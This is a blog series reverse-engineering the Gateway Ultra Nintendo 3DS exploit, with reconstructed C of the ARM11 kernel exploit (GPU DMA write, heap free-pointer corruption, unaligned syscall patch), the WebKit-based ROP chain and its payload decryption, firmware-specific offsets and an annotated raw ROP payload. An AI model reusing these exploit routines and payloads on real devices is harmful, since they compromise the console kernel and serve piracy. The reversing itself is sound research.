It’s been a couple of days since my initial analysis of Gateway Ultra, released last week to enable piracy on 3DS. I spent most of this time catching up on the internals of the 3DS. I can’t thank the maintainers of 3dbrew enough (especially yellows8, the master of 3DS reversing) for the amount of detailed and technical knowledge found on the wiki. The first stage was a warmup and did not require any specific 3DS knowledge to reverse. The problem with the second stage is that while it is easy to see the exploit triggered and code to run, the actual exploit itself was not as clear. I looked at all the function calls made, formed a couple of hypotheses about where the vulnerability resided, and reversed each function to the end to test them. Although there were many dead ends and false leads, the process of reversing all these functions solidified my understanding of the system.

Code

As always, I like to post the reversed code first so those with more knowledge than me don’t have to read my verbose descriptions. I will explain the interesting parts afterwards. I am including the full code listing of the shellcode, including parts that are irrelevant to the exploit because they are used as obfuscation, to provide stability, or as setup for later parts.

int memcpy(void *dst, const void *src, unsigned int len);
int GX_SetTextureCopy(void *input_buffer, void *output_buffer, unsigned int size, 
                      int in_x, int in_y, int out_x, int out_y, int flags);
int GSPGPU_FlushDataCache(void *addr, unsigned int len);
int svcSleepThread(unsigned long long nanoseconds);
int svcControlMemory(void **outaddr, unsigned int addr0, unsigned int addr1, 
                     unsigned int size, int operation, int permissions);

int
do_gspwn_copy (void *dst, unsigned int len, unsigned int check_val, int check_off)
{
    unsigned int result;

    do
    {
        memcpy (0x18401000, 0x18401000, 0x10000);
        GSPGPU_FlushDataCache (0x18402000, len);
        // src always 0x18402000
        GX_SetTextureCopy(0x18402000, dst, len, 0, 0, 0, 0, 8);
        GSPGPU_FlushDataCache (0x18401000, 16);
        GX_SetTextureCopy(dst, 0x18401000, 0x40, 0, 0, 0, 0, 8);
        memcpy(0x18401000, 0x18401000, 0x10000);
        result = *(unsigned int *)(0x18401000 + check_off);
    } while (result != check_val);

    return 0;
}

int
arm11_kernel_exploit_setup (void)
{
    unsigned int patch_addr;
    unsigned int *buffer;
    int i;
    int (*nop_func)(void);
    int *ipc_buf;
    int model;

    // part 1: corrupt kernel memory
    buffer = 0x18402000;
    // 0xFFFFFE0 is just stack memory for scratch space
    svcControlMemory(0xFFFFFE0, 0x18451000, 0, 0x1000, 1, 0); // free page
    patch_addr = *(int *)0x08F028A4;
    buffer[0] = 1;
    buffer[1] = patch_addr;
    buffer[2] = 0;
    buffer[3] = 0;
    // overwrite free pointer
    do_gspwn_copy(0x18451000, 0x10u, patch_addr, 4);
    // trigger write to kernel
    svcControlMemory(0xFFFFFE0, 0x18450000, 0, 0x1000, 1, 0);

    // part 2: obfuscation or trick to clear code cache
    for (i = 0; i < 0x1000; i++)
    {
        buffer[i] = 0xE1A00000; // ARM NOP instruction
    }
    buffer[i-1] = 0xE12FFF1E; // ARM BX LR instruction
    nop_func = *(unsigned int *)0x08F02894 - 0x10000; // 0x10000 below current code
    do_gspwn_copy(*(unsigned int *)0x08F028A0 - 0x10000, 0x10000, 0xE1A00000, 0);
    nop_func ();

    // part 3: get console model for future use (?)
    __asm__ ("mrc p15,0,%0,c13,c0,3\t\n"
             "add %0, %0, #128\t\n" : "=r" (ipc_buf));

    ipc_buf[0] = 0x50000;
    __asm__ ("mov r4, %0\t\n"
             "mov r0, %1\t\n"
             "ldr r0, [r0]\t\n"
             "svc 0x32\t\n" :: "r" (ipc_buf), "r" (0x3DAAF0) : "r0", "r4");

    if (ipc_buf[1])
    {
        model = ipc_buf[2] & 0xFF;
    }
    else
    {
        model = -1;
    }
    *(int *)0x8F01028 = model;

    return 0;
}

// after running setup, run this to execute func in ARM11 kernel mode
int __attribute__((naked))
arm11_kernel_exploit_exec (int (*func)(int, int, int), int arg1, int arg2)
{
    __asm__ ("mov r5, %0\t\n" // R5 = 0x3D1FFC, not used. likely obfuscation.
             "svc 8\t\n" // CreateThread syscall, corrupted, args not needed
             "bx lr\t\n" :: "r" (0x3D1FFC) : "r5");
}

Vulnerability

The main vulnerability is actually still gspwn. Whereas in the first stage, it was used to overwrite (usually read-only) code from a CRO dynamic library to get userland code execution, it is now used to overwrite a heap free pointer so when the next memory page is freed, it would overwrite kernel memory.

3DS Memory Layout

To understand how the free pointer write corruption works, let’s first go over how the 3DS memory is laid out (in simple terms). You can get the full picture here, but I want to go over some key points. First, the “main” memory (used by applications and services) called the FCRAM is located at physical address 0x20000000 to 0x28000000. It is mapped in virtual memory in many places. First, the main application which is at around FCRAM 0x23xxxxxx (or higher if it is a system process or applet like the web browser) is mapped to 0x00100000 as read-only. Next we have some pages in the FCRAM 0x24xxxxxx region that can be mapped by the application on demand to virtual address 0x18xxxxxx through the syscall ControlMemory. Finally, the entire FCRAM is mapped in kernel 0xF0000000 – 0xF8000000 (this is for 4.1, different in other versions).

Another note about memory is that the ARM11 kernel is not located in the FCRAM, but in something called the AXI WRAM. The name is not important, but what is important is that its physical address 0x1FF80000 is mapped twice in kernel memory space. 0xFFF60000 is marked read-only executable and 0xEFF80000 is marked read-write non-executable. However, writing to 0xEFF80000 will allow you to execute the code at 0xFFF60000, which defeats the whole purpose of marking the pages non-executable. Since these mappings only apply in kernel mode, you would still need to perform a write to that address with kernel permissions.
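When following addresses around in this post, it helps to have the translations written down. The sketch below converts FCRAM physical addresses to the 4.x kernel mapping and addresses in the read-write AXI WRAM alias back to physical. It assumes both mappings are linear, which matches every address pair quoted in these posts but is not something I have verified across the whole range. Other firmware versions use different bases.

```python
FCRAM_PHYS = 0x20000000
FCRAM_SIZE = 0x08000000
FCRAM_KERNEL_4X = 0xF0000000   # kernel mapping on 4.x, differs elsewhere

AXI_WRAM_PHYS = 0x1FF80000
AXI_WRAM_KERNEL_RW = 0xEFF80000  # read-write, non-executable alias


def fcram_phys_to_kernel(pa):
    """FCRAM physical address to its 4.x kernel virtual address."""
    if not FCRAM_PHYS <= pa < FCRAM_PHYS + FCRAM_SIZE:
        raise ValueError("not an FCRAM physical address")
    return pa - FCRAM_PHYS + FCRAM_KERNEL_4X


def axi_rw_to_phys(va):
    """Address in the read-write AXI WRAM alias to its physical address."""
    return va - AXI_WRAM_KERNEL_RW + AXI_WRAM_PHYS
```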

ControlMemory Unchecked Write

The usual process for handling user controlled pointers in a syscall is to use the special ARM instructions LDRT and STRT, which perform the pointer dereference with user privileges in kernel mode. However, what if we overwrite a pointer that the developers did not think is user controlled? It would use the regular LDR/STR instructions and dereference with kernel privileges. The goal is achieved by the ControlMemory syscall along with gspwn. The ControlMemory syscall is used to allocate and free pages of memory from the heap region of the FCRAM. When it is called to free, like most heap allocators, certain pointers are stored in the newly freed memory block (to point to the next and previous free blocks). Like most heap allocators, it also performs “coalescing,” which means two adjacent free blocks will be combined to form a larger free block (and the pointers to and from it are updated accordingly).

The plan here is to free a block of memory, which places certain pointers in the freed block. This is usually safe since once the user frees the block, it is unmapped from the user virtual memory space and they cannot access the memory any more. However, gspwn still lets us write to it, so we use gspwn to overwrite the free pointer and redirect the allocator’s write into the code in the 0xEFF80000 region. That is possible because the pointer dereference is done with kernel permissions, since the pointers stored here are not normally user accessible.

The data stored in the freed region is as follows:

struct free_data
{
    int some_count;
    struct free_data *next_free_block;
    struct free_data *prev_free_block;
    int unk_C;
    int unk_10;
};

When the first ControlMemory call happens in the exploit, it frees FCRAM 0x24451000 and writes the free_data structure to it. We then use gspwn to overwrite next_free_block to point to the kernel code we want to overwrite. Next we call ControlMemory to free the page immediately before (FCRAM 0x24450000). This coalesces the two blocks, roughly as follows:

((struct free_data *)0x24450000)->next_free_block = ((struct free_data *)0x24451000)->next_free_block;
((struct free_data *)0x24451000)->next_free_block->prev_free_block = (struct free_data *)0x24450000;

As you can see, we control next_free_block of 0x24451000 and therefore control the write.
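To make the unlink step concrete, here is a small host-side sketch of the two assignments above. It is only a model under stated assumptions: the `coalesce` helper name is made up for illustration, the blocks are ordinary C objects rather than FCRAM pages, and the real kernel routine almost certainly does more bookkeeping than this.

```c
#include <assert.h>
#include <stddef.h>

/* Same layout as the structure described above. */
struct free_data
{
    int some_count;
    struct free_data *next_free_block;
    struct free_data *prev_free_block;
    int unk_C;
    int unk_10;
};

/*
 * Hypothetical model of the coalescing step (not the kernel's real code):
 * `lower` is the block being freed, `upper` is the already-free block
 * directly after it.
 */
void coalesce(struct free_data *lower, struct free_data *upper)
{
    assert(lower != NULL && upper != NULL && upper->next_free_block != NULL);

    lower->next_free_block = upper->next_free_block;
    /* This is the store the attacker redirects: it lands wherever
     * upper->next_free_block points, at the offset of prev_free_block. */
    upper->next_free_block->prev_free_block = lower;
}
```

If `upper.next_free_block` is replaced with the address of some `target` (in the exploit, via gspwn), then `coalesce(&lower, &upper)` stores `&lower` into `target.prev_free_block`. With 4-byte ints and pointers, as on the 3DS, that field sits at offset 8, so the written word lands 8 bytes past the forged pointer.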

… But we’re not done yet. The above pseudocode was an artist’s rendition of what happens. Obviously, physical addresses are not used here. The user region virtual address (0x18xxxxxx) is not used either. The pointers here are the kernel virtual addresses 0xF4450000 and 0xF4451000. Since we can only write the value 0xF4450000 (or on 9.2, 0xE4450000), this poses a problem. Ideally, we want to write some ARM instruction that allows us to jump to code we control (BX R0 for example); however, 0xF4450000 disassembles to “vst4.8 {d16-d19}, [r5], r0” (don’t worry, I don’t know what that is either) and 0xE4450000 disassembles to “strb r0, [r5], #-0”. Neither can (obviously) be used to control code execution. Now of course, we can try another address and see if we get lucky and the address happens to decode as a branch instruction, but we are not lucky. None of the user mappable/unmappable regions would give us a branch.

Unaligned Code Corruption

Here is the clever idea. What if we stop thinking of the problem as: how do I write an instruction that gives us execution control? but instead as: how do I corrupt the code to control it? I don’t usually like to post assembly listings, but it is impossible to dodge ARM assembly if you made it this far.

A note to systems programmers: There is a feature of ARMv6 that the 3DS enables called unaligned read/write. This means a pointer does NOT have to be word aligned. In other words, you are allowed to write 4 arbitrary bytes to any address, including something like “0x1003”. Now if you’re not a systems designer and don’t know about the problem of unaligned reads/writes (C nicely hides this from you), don’t worry, it just means everything works as you expect it to.

Let’s take a look at an arbitrary syscall, CreateThread. The actual syscall doesn’t matter, we only care about the assembly code that it runs:

   0:	e52de004 	push	{lr}		; (str lr, [sp, #-4]!)
   4:	e24dd00c 	sub	sp, sp, #12
   8:	e58d4004 	str	r4, [sp, #4]
   c:	e58d0000 	str	r0, [sp]
  10:	e28d0008 	add	r0, sp, #8
  14:	eb001051 	bl	0x4160
  18:	e59d1008 	ldr	r1, [sp, #8]
  1c:	e28dd00c 	add	sp, sp, #12
  20:	e49df004 	pop	{pc}		; (ldr pc, [sp], #4)

How do we patch this to control code flow? What if we get rid of the “add” on line 0x1c? Then we have on line 0xc, *SP = R0 and on line 0x20, PC = *SP, and since we trivially control R0 in a syscall, we can pass in a function pointer and run it.

Now if we replace the code at 0x18 with either 0xF4450000 or 0xE4450000, another problem arises. Both of those instructions (and there may be others from other firmware versions) try to dereference R5, which we don’t control. However, what if we write 0xF4450000/0xE4450000 starting at 0x1B? It would now corrupt two instructions instead of just one, but both are “safe” instructions.

...
  14:	eb001051 	bl	0x4160
  18:	009d1008 	addseq	r1, sp, r8
  1c:	e2e44500 	rsc	r4, r4, #0, 10
...

The actual code that is there isn’t particularly useful/important, which is exactly what we want. We successfully patched the kernel to jump to our code with a single syscall. Now making SVC 8 with R0 pointing to some function would run it in ARM11 kernel mode.
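The byte-level effect of the unaligned store can be checked on a PC. The sketch below copies the CreateThread stub from the listing into a byte array and performs a little-endian 4-byte store at offset 0x1B. The helper names are made up for illustration, and the model assumes the kernel code is stored little-endian, which is the normal ARM11 configuration.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define STUB_SIZE 0x24 /* nine 32-bit instructions from the listing above */

/* Read a little-endian 32-bit word from a byte buffer. */
uint32_t read_le32(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Write a little-endian 32-bit word; the address may be unaligned. */
void write_le32(uint8_t *p, uint32_t v)
{
    p[0] = (uint8_t)v;
    p[1] = (uint8_t)(v >> 8);
    p[2] = (uint8_t)(v >> 16);
    p[3] = (uint8_t)(v >> 24);
}

/* Fill `code` with the instruction words of the CreateThread stub. */
void load_stub(uint8_t code[STUB_SIZE])
{
    static const uint32_t words[STUB_SIZE / 4] = {
        0xe52de004, 0xe24dd00c, 0xe58d4004, 0xe58d0000, 0xe28d0008,
        0xeb001051, 0xe59d1008, 0xe28dd00c, 0xe49df004
    };
    size_t i;
    for (i = 0; i < STUB_SIZE / 4; i++)
        write_le32(code + 4 * i, words[i]);
}

/* Model of the kernel's store of the block pointer at a chosen offset. */
void unaligned_store(uint8_t *code, size_t offset, uint32_t value)
{
    assert(offset + 4 <= STUB_SIZE);
    write_le32(code + offset, value);
}
```

After `load_stub(code)` and `unaligned_store(code, 0x1B, 0xE4450000)`, the words at 0x18 and 0x1c read back as 0x009d1008 and 0xe2e44500, matching the patched listing, while the `pop {pc}` at 0x20 is untouched. With 0xF4450000 the word at 0x1c becomes 0xe2f44500 instead.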

Closing

Although some may call this exploit overly simple, I thought the way it was exploited was very novel. It involved overwriting pointers that are meant to be inaccessible to users, then a type confusion of pointer to ARM code, and finally abusing unaligned writes to corrupt instructions in a safe way. Next time, I hope to conclude this series by reversing the ARM9 kernel exploit (for those unfamiliar, the 3DS has two kernels, one for applications and one for security, ARM9 is the interesting one). I want to thank, again, sbJFn5r for providing me with various dumps.

Reversing Gateway Ultra First Stage (Part 2)

When we last left off, we looked at the ROP code that loaded a larger second-part of the payload. Now we will walk through what was loaded and how userland native code execution was achieved. I am still an amateur at 3DS hacking so I am sure to get some things wrong, so please post any corrections you have in the comments and I will update the post as needed.

Pseudocode

Some of the hard coded addresses are inside the stack payload loaded by the first part from Launcher.dat (at 0x08F01000).

int GX_SetTextureCopy(void *input_buffer, void *output_buffer, unsigned int size, 
int in_x, int in_y, int out_x, int out_y, int flags);
int GSPGPU_FlushDataCache(void *addr, unsigned int len);
int svcSleepThread(unsigned long long nanoseconds);
void memcpy(void *dst, const void *src, unsigned int len);

// There are offsets and addresses specific to each FW version inside of 
// the first stage that is used by both the first and second stage payloads
struct fw_specific_data // example for 4.1.0
{
    void (*payload_code)(void); // 0x009D2000
    unsigned int unk_4; // 0x252D3000
    unsigned int orig_code; // 0x1E5F8FFD
    void *payload_target; // 0x192D3000
    unsigned int unk_10; // 0xEFF83C97
    unsigned int unk_14; // 0xF0000000
    unsigned int unk_18; // 0xE8000000
    unsigned int unk_1C; // 0xEFFF4C80
    unsigned int unk_20; // 0xEFFE4DD4
    unsigned int unk_24; // 0xFFF84DDC
    unsigned int unk_28; // 0xFFF748C4
    unsigned int unk_2C; // 0xEFFF497C
    unsigned int unk_30; // 0x1FFF4C84
    unsigned int unk_34; // 0xFFFD0000
    unsigned int unk_38; // 0xFFFD2000
    unsigned int unk_3C; // 0xFFFD4000
    unsigned int unk_40; // 0xFFFCE000
};

void payload() // base at 0x08F01000
{
    int i;
    unsigned int kversion;
    struct fw_specific_data *data;
    int code_not_copied;

    // part 1, some setup
    *(int*)0x08000838 = 0x08F02B3C;
    svcSleepThread (0x400000LL);
    svcSleepThread (0x400000LL);
    svcSleepThread (0x400000LL);
    for (i = 0; i < 3; i++) // do 3 times to be safe
    {
        GSPGPU_FlushDataCache (0x18000000, 0x00038400);
        GX_SetTextureCopy (0x18000000, 0x1F48F000, 0x00038400, 0, 0, 0, 0, 8);
        svcSleepThread (0x400000LL);
        GSPGPU_FlushDataCache (0x18000000, 0x00038400);
        GX_SetTextureCopy (0x18000000, 0x1F4C7800, 0x00038400, 0, 0, 0, 0, 8);
        svcSleepThread (0x400000LL);
    }

    kversion = *(unsigned int *)0x1FF80000; // KERNEL_VERSION register
    data = 0x08F02894; // buffer to store FW specific data

    // part 2, get kernel specific data from our buffer
    if (kversion == 0x02220000) // 2.34-0 4.1.0
    {
        memcpy (data, 0x08F028D8, 0x44);
    }
    else if (kversion == 0x02230600) // 2.35-6 5.0.0
    {
        memcpy (data, 0x08F0291C, 0x44);
    }
    else if (kversion == 0x02240000) // 2.36-0 5.1.0
    {
        memcpy (data, 0x08F02960, 0x44);
    }
    else if (kversion == 0x02250000) // 2.37-0 6.0.0
    {
        memcpy (data, 0x08F029A4, 0x44);
    }
    else if (kversion == 0x02260000) // 2.38-0 6.1.0
    {
        memcpy (data, 0x08F029E8, 0x44);
    }
    else if (kversion == 0x02270400) // 2.39-4 7.0.0
    {
        memcpy (data, 0x08F02A2C, 0x44);
    }
    else if (kversion == 0x02280000) // 2.40-0 7.2.0
    {
        memcpy (data, 0x08F02A70, 0x44);
    }
    else if (kversion == 0x022C0600) // 2.44-6 8.0.0
    {
        memcpy (data, 0x08F02AB4, 0x44);
    }

    // part 3, execute code
    do
    {
        // if the function still has its original code, we try again
        code_not_copied = (*(unsigned int *)data->payload_code + data->orig_code) == 0;
        // copy second stage to FCRAM
        memcpy (0x18410000, 0x08F02B90, 0x000021F0);
        // make sure data is written and cache flushed || attempted GW obfuscation
        memcpy (0x18410000, 0x18410000, 0x00010000);
        memcpy (0x18410000, 0x18410000, 0x00010000);
        GSPGPU_FlushDataCache (0x18410000, 0x000021F0);
        // copy the second stage code
        GX_SetTextureCopy (0x18410000, data->payload_target, 0x000021F0, 0, 0, 0, 0, 8);
        svcSleepThread (0x400000LL);
        memcpy (0x18410000, 0x18410000, 0x00010000);
    } while (code_not_copied);

    ((void (*)(void))0x009D2000)();
    // I think it was originally data->payload_code but later they hard coded it 
    // for some reason
}

Details

The first part, I’m not too sure about. I think it’s either some required housekeeping or needless calls to obfuscate the exploit (found later). I couldn’t find any documentation on the 0x1F4XXXXX region except that it is in VRAM. (EDIT: plutoo tells me it’s the framebuffer. Likely the screen is cleared black for debugging or something.) I am also unsure of the purpose of setting 0x08000838 to some location in the payload that is filled with “0x002CAFE4”. In the second part, version-specific information for each released kernel version is copied to a global space for use by both the first stage and the second stage exploit code. (This includes specific kernel addresses and the like.)
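The version check in part 2 is really a table lookup: the eight source addresses are exactly 0x44 bytes apart, and the comments next to each constant suggest the raw value packs major, minor and revision into its top three bytes. A minimal sketch of both observations follows. The function and type names are invented for illustration, and returning 0 for an unknown version is my own choice (the original chain simply copies nothing in that case).

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define FW_TABLE_BASE 0x08F028D8u /* first entry (4.1.0) inside the payload */
#define FW_ENTRY_SIZE 0x44u       /* size of one per-firmware structure */

/* Kernel versions in the same order as the if/else chain. */
static const uint32_t known_kversions[] = {
    0x02220000u, 0x02230600u, 0x02240000u, 0x02250000u,
    0x02260000u, 0x02270400u, 0x02280000u, 0x022C0600u
};

struct kversion { unsigned major, minor, revision; };

/* Split the raw value the way the "2.34-0" style comments imply. */
struct kversion decode_kversion(uint32_t raw)
{
    struct kversion v;
    v.major = (raw >> 24) & 0xFF;
    v.minor = (raw >> 16) & 0xFF;
    v.revision = (raw >> 8) & 0xFF;
    return v;
}

/* Payload address of the matching entry, or 0 if the version is unknown. */
uint32_t fw_entry_address(uint32_t raw)
{
    size_t i;
    for (i = 0; i < sizeof known_kversions / sizeof known_kversions[0]; i++)
        if (known_kversions[i] == raw)
            return FW_TABLE_BASE + (uint32_t)i * FW_ENTRY_SIZE;
    return 0;
}
```

For example, `decode_kversion(0x022C0600)` gives 2.44-6, and `fw_entry_address(0x02230600)` gives 0x08F0291C, the same address used in the 5.0.0 branch.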

The meat of the exploit is an unchecked GPU DMA write that allows the attacker to overwrite read-only executable pages in memory. This is the same exploit used by smealum in his ninjhax, and he gives a much better explanation of “gspwn” in his blog. In short, certain areas of physical memory are mapped at some virtual address as read-only executable (EDIT: yellows8 tells me specifically, this is in a CRO, which is something like shared libraries for 3DS) but when the physical address of the same location is written to by the GPU, the write does not go through the CPU’s MMU (since the GPU is a different device) and succeeds. The thread sleeps (and maybe the weird useless memcpys) are needed because the CPU’s various levels of cache need some time to see the changes that they did not expect from the GPU.

The second stage of the payload is the ARM code copied from Launcher.dat (3.0.0) offset 0x1B90 for a length of 0x21F0 (remember to decrypt it using the “add”-pad stream cipher described in the first post).

Raw ROP Payload Annotated

It is a huge mess, but for those who are curious, here it is. The bulk of the code is useless obfuscation (for example, it would pop 9 registers full of junk data and then fill the same 9 registers with more junk data afterwards). However, the obfuscation is easy to get past if you just ignore everything except gadgets that 1) load from memory, 2) store to memory, 3) set flags, or 4) call functions. Every other gadget is useless. They also do this weird thing where they “memcpy” one part of the stack to another part (which goes past the current SP). However, comparing the two blocks of data (before and after the copy) shows nothing different aside from some garbage values.

Reversing Gateway Ultra First Stage (Part 1)

And now for something completely different…

As a break from Vita hacking, I’ve decided to play around with the Nintendo 3DS exploit released by Gateway yesterday. The 3DS is a much easier console to hack, but unfortunately, the scene is dominated by a piracy company who, ironically, implement various “features” to protect their intellectual property (one such feature purposely bricks any user of a cloned piracy cart–and also “legitimate” users too). Ethics aside, it would be useful to reverse Gateway’s exploits and use them for homebrew loading so I took a quick look at it. The first stage of the exploit is an entry-point into the system that allows code to run in the unprivileged user-mode. It is usually used to exploit a kernel vulnerability, which is the second stage. In the unique case of Gateway, the first stage is broken up into two parts (in order for them to obfuscate their payload). I am only going to look at the first part for now.

Vulnerability

The userland vulnerability is a known use-after-free bug in WebKit found in April last year (and no, the latest Vita firmware is not vulnerable). Depending on the user-agent of the 3DS visiting the exploit page, a different payload for that browser version is sent. A GBATemp user has dumped all the possible payloads, and I used the 4.x one in my analysis (although I believe the only difference between the payloads is memory offsets).

Details

This is what the initial first stage payload does:

void *_this = (void *)0x08F10000;
unsigned int *read_len = (unsigned int *)0x08F10020;
unsigned int *buffer = (unsigned int *)0x08F01000;
unsigned int state = 0; // unsigned so the additions wrap modulo 2^32
int i = 0;
FS_MOUNTSDMC("dmc:");
IFile_Open(_this, L"dmc:/Launcher.dat", 0x1);
*((int *)_this + 1) = 0x00012000; // fseek according to sm on #3dsdev
IFile_Read(_this, read_len, buffer, 0x4000);

for (i = 0; i < 0x4000/4; i++)
{
    state += 0xD5828281;
    buffer[i] += state;
}

The important part here is that the rest of the payload is decrypted from “Launcher.dat” by creating a stream cipher from a (crappy) PRNG that just increments by 0xD5828281 every iteration. Instead of an xor-pad, it uses an “add”-pad. Otherwise it is pretty standard obfuscation. A neat trick in this ROP payload is the casting of ARM code as Thumb to get gadgets that were not originally compiled into code (I am unsure if they also tried casting RO data as Thumb code, as that is also a way of getting extra gadgets). Another neat trick is emulating loops by using ARM conditional stores to conditionally set the stack pointer to some value (although I was told they used this trick in the original Gateway payload too).
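For anyone who wants to decrypt the block on a PC instead of on the console, the “add”-pad is only a few lines. This is a sketch, not a finished tool: the function names are mine, and it assumes the 0x4000 bytes read from offset 0x12000 of Launcher.dat have already been loaded into an array of 32-bit words in little-endian order (which is what a plain `fread` gives you on a little-endian host).

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define ADDPAD_STEP 0xD5828281u /* the PRNG "increment" from the ROP chain */

/* Undo the obfuscation: add the running pad to every 32-bit word. */
void addpad_decrypt(uint32_t *words, size_t count)
{
    uint32_t state = 0;
    size_t i;

    assert(words != NULL || count == 0);
    for (i = 0; i < count; i++) {
        state += ADDPAD_STEP; /* unsigned arithmetic wraps modulo 2^32 */
        words[i] += state;
    }
}

/* Inverse operation, handy for re-packing a modified payload. */
void addpad_encrypt(uint32_t *words, size_t count)
{
    uint32_t state = 0;
    size_t i;

    assert(words != NULL || count == 0);
    for (i = 0; i < count; i++) {
        state += ADDPAD_STEP;
        words[i] -= state;
    }
}
```

Because the pad does not depend on the data, decrypting an all-zero buffer simply prints the pad itself: the first two words come out as 0xD5828281 and 0xAB050502.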

Future

The first part was very simple and straightforward and was easy to reverse. I am expecting that the second part would involve a lot more code so I may need to work on a tool to extract the gadgets from code. (By the way, thanks to sbJFn5r on #3dsdev for providing me with the WebKit code to look at and sm for the hint about fseek). It is likely that I won’t have the time to continue this though (still working on the Vita) but it seems like many others are farther ahead than me anyways.

Payload

For those who care, the raw (annotated) payload for 4.X:

0x08B47400: 0x0010FFFD ; (nop) POP {PC}
0x08B47404: 0x0010FFFD ; (nop) POP {PC}
0x08B47408: 0x0010FFFD ; (nop) POP {PC}
0x08B4740C: 0x0010FFFD ; (nop) POP {PC}
0x08B47410: 0x002AD574 ; LDMFD   SP!, {R0,PC}
0x08B47414: 0x002A5F27 ; R0 = "dmc:"
0x08B47418: 0x00332BEC ; FS_MOUNTSDMC(), then LDMFD   SP!, {R3-R5,PC}
0x08B4741C: 0x08B475F0 ; R3, dummy
0x08B47420: 0x00188008 ; R4, dummy
0x08B47424: 0x001DA00C ; R5, dummy
0x08B47428: 0x0017943B ; Thumb: POP     {R0-R4,R7,PC}
0x08B4742C: 0x08F10000 ; R0 = this
0x08B47430: 0x08B47630 ; R1 = L"dmc:/Launcher.dat"
0x08B47434: 0x00000001 ; R2 = read/only
0x08B47438: 0x0039B020 ; R3, dummy
0x08B4743C: 0x001CC01C ; R4, dummy
0x08B47440: 0x002C6010 ; R7, dummy
0x08B47444: 0x0025B0A8 ; IFile_Open(), then LDMFD   SP!, {R4-R7,PC}
0x08B47448: 0x00231FF0 ; R4, dummy
0x08B4744C: 0x002CBFF0 ; R5, dummy
0x08B47450: 0x00124000 ; R6, dummy
0x08B47454: 0x0033FFFD ; R7, dummy
0x08B47458: 0x0010FFFD ; (nop) POP {PC}
0x08B4745C: 0x002AD574 ; LDMFD   SP!, {R0,PC}
0x08B47460: 0x00012000 ; R0
0x08B47464: 0x00269758 ; LDMFD   SP!, {R1,PC}
0x08B47468: 0x08F10004 ; R1
0x08B4746C: 0x00140450 ; *(int*)0x08F10004 = 0x00012000, then LDMFD   SP!, {R4,PC}
0x08B47470: 0x001CC024 ; R4
0x08B47474: 0x0017943B ; Thumb: POP     {R0-R4,R7,PC}
0x08B47478: 0x08F10000 ; R0 = this
0x08B4747C: 0x08F10020 ; R1 = p_total_read
0x08B47480: 0x08F01000 ; R2 = read_buffer
0x08B47484: 0x00004000 ; R3 = size
0x08B47488: 0x00295FF8 ; R4, dummy
0x08B4748C: 0x00253FFC ; R7, dummy
0x08B47490: 0x002FC8E8 ; IFile_Read, then LDMFD   SP!, {R4-R9,PC}
0x08B47494: 0x002BE030 ; R4, dummy
0x08B47498: 0x00212010 ; R5, dummy
0x08B4749C: 0x00271F40 ; R6, dummy
0x08B474A0: 0x0020C05C ; R7, dummy
0x08B474A4: 0x002DE0C4 ; R8, dummy
... START_DECODE_LOOP ...
0x08B474A8: 0x001B2000 ; R9, dummy || LR, dummy (upon loop)
0x08B474AC: 0x002AD574 ; LDMFD   SP!, {R0,PC}
0x08B474B0: 0x08B4750C ; R0 (&state)
0x08B474B4: 0x001CCC64 ; R0 = *R0 = state, LDMFD   SP!, {R4,PC}
0x08B474B8: 0x001057C4 ; R4, dummy
0x08B474BC: 0x00269758 ; LDMFD   SP!, {R1,PC}
0x08B474C0: 0xD5828281 ; R1 (seed)
0x08B474C4: 0x00207954 ; R0 = R0 + R1, LDMFD   SP!, {R4,PC}
0x08B474C8: 0x0011FFFD ; R4, dummy
0x08B474CC: 0x00269758 ; LDMFD   SP!, {R1,PC}
0x08B474D0: 0x08B4750C ; R1 (&state)
0x08B474D4: 0x00140450 ; *R1 = R0 = next random, LDMFD   SP!, {R4,PC}
0x08B474D8: 0x00354850 ; R4, dummy
0x08B474DC: 0x002AD574 ; LDMFD   SP!, {R0,PC}
0x08B474E0: 0x08B47618 ; R0 (&buffer)
0x08B474E4: 0x001CCC64 ; R0 = *R0 = buffer, LDMFD   SP!, {R4,PC}
0x08B474E8: 0x00127F6D ; R4, dummy
0x08B474EC: 0x00100D24 ; LDMFD   SP!, {R4-R6,PC}
0x08B474F0: 0x001037E0 ; R4, dummy
0x08B474F4: 0x08B4748C ; R5, dummy
0x08B474F8: 0x08B4740C ; R6, dummy
0x08B474FC: 0x001CCC64 ; R0 = *R0 (read32 from buffer), LDMFD   SP!, {R4,PC}
0x08B47500: 0x0011BB00 ; R4, dummy
0x08B47504: 0x0010FFFD ; (nop) POP {PC}
0x08B47508: 0x00269758 ; LDMFD   SP!, {R1,PC}
0x08B4750C: 0x00000000 ; R1 (PRNG state)
0x08B47510: 0x00207954 ; R0 = R0 + R1 (add PRNG state to buffer data), LDMFD   SP!, {R4,PC}
0x08B47514: 0x001303A0 ; R4, dummy
0x08B47518: 0x00103DA8 ; LDMFD   SP!, {R4-R12,PC}
0x08B4751C: 0x00101434 ; R4, dummy
0x08B47520: 0x0022FF64 ; R5, dummy
0x08B47524: 0x001303A0 ; R6, dummy
0x08B47528: 0x08B47400 ; R7, dummy
0x08B4752C: 0x0010FFFD ; R8, dummy
0x08B47530: 0x0010FFFD ; R9, dummy
0x08B47534: 0x00100B5C ; R10, dummy
0x08B47538: 0x0022FE44 ; R11, dummy
0x08B4753C: 0x0010FFFD ; R12, (nop) POP {PC}
0x08B47540: 0x0018114C ; LDMFD   SP!, {R4-R6,LR}, BX R12
0x08B47544: 0x001057C4 ; R4, dummy
0x08B47548: 0x00228AF4 ; R5, dummy
0x08B4754C: 0x00350658 ; R6, dummy
0x08B47550: 0x0010FFFD ; LR, (nop) POP {PC}
0x08B47554: 0x00158DE7 ; R1 = R0 = (decoded data), BLX LR
0x08B47558: 0x002AD574 ; LDMFD   SP!, {R0,PC}
0x08B4755C: 0x08B47618 ; R0 (&buffer)
0x08B47560: 0x001CCC64 ; R0 = *R0 = buffer, LDMFD   SP!, {R4,PC}
0x08B47564: 0x0011FFFD ; R4, dummy
0x08B47568: 0x00119B94 ; *R0 = R1 = (decoded data), LDMFD   SP!, {R4,PC}
0x08B4756C: 0x00106694 ; R4, dummy
0x08B47570: 0x00269758 ; LDMFD   SP!, {R1,PC}
0x08B47574: 0x00000004 ; R1
0x08B47578: 0x00207954 ; R0 = R0 + R1 (buffer + 4), LDMFD   SP!, {R4,PC}
